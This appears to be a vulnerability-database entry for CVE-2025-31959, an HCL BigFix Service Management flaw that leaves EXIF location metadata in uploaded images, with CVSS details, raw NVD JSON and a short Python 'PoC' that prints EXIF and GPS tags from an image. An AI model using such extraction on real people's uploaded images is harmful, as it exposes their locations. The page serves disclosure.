Security Vulnerability Report
CVE-2025-31959 CVSS 3.5 LOW

CVE-2025-31959

Published: 2026-05-06 15:16:06
Last Modified: 2026-05-07 16:35:04

Description

HCL BigFix Service Management (SM) application fails to strip EXIF metadata from uploaded images. This could lead to confidentiality and privacy risks if sensitive location information is unintentionally shared.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix Service Management (SM) (for the specific affected versions, refer to the official advisory KB0128144)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import PIL.Image
from PIL.ExifTags import TAGS, GPSTAGS


def get_exif_data(image_path):
    """
    Proof of Concept to extract EXIF data from an image.
    This simulates an attacker analyzing a downloaded image.
    """
    try:
        image = PIL.Image.open(image_path)

        # Verify if image has EXIF data
        # (_getexif() is Pillow's legacy accessor; it returns a flat dict
        # in which the GPSInfo tag is already expanded into a sub-dict)
        exif_data = image._getexif()
        if exif_data is None:
            print("No EXIF metadata found.")
            return

        print(f"[+] Analyzing {image_path}...")
        for tag, value in exif_data.items():
            # Map the numeric tag id to its name; fall back to the raw id
            tag_name = TAGS.get(tag, tag)

            # Extract GPS Info specifically
            if tag_name == "GPSInfo":
                print(" [!] Found GPS Info:")
                for gps_tag in value:
                    gps_tag_name = GPSTAGS.get(gps_tag, gps_tag)
                    print(f" {gps_tag_name}: {value[gps_tag]}")
            else:
                # Print other common tags (filtering binary data for display)
                if isinstance(value, (str, int, float, tuple)):
                    print(f" {tag_name}: {value}")
    except Exception as e:
        print(f"Error: {e}")


# Example usage:
# get_exif_data("vulnerable_image.jpg")
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31959", "sourceIdentifier": "[email protected]", "published": "2026-05-06T15:16:05.870", "lastModified": "2026-05-07T16:35:04.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Service Management (SM) application fails to strip EXIF metadata from uploaded images. This could lead to confidentiality and privacy risks if sensitive location information is unintentionally shared. ."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1230"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D915AC1-7C2B-497D-9A77-9726954B2282"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}